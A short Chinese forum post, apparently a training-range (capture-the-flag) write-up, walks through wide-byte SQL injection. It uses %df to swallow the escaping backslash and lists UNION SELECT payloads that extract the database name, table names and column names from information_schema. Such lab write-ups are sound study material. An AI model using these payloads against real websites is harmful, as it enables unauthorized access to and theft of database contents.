6.3.1-SQL注入-宽字节注入Rank 1

繁夜   ·   发表于 2019-02-15 12:45:58   ·   技术文章投稿区

 进入靶场 输入id=1


宽字节注入原理其实和显错没有其他区别 唯一不同的就是我们需要利用编码不同把魔术引号吃掉进行攻击

?id=1%df' and 1=2 union select 1,2,database()%23


接下来爆表名

?id=1 %df' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() %23


爆字段

?id=1 %df' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7a6b6171 %23


爆flag

打赏我,让我更有动力~

0 Reply   |  Until 2019-2-15 | 915 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.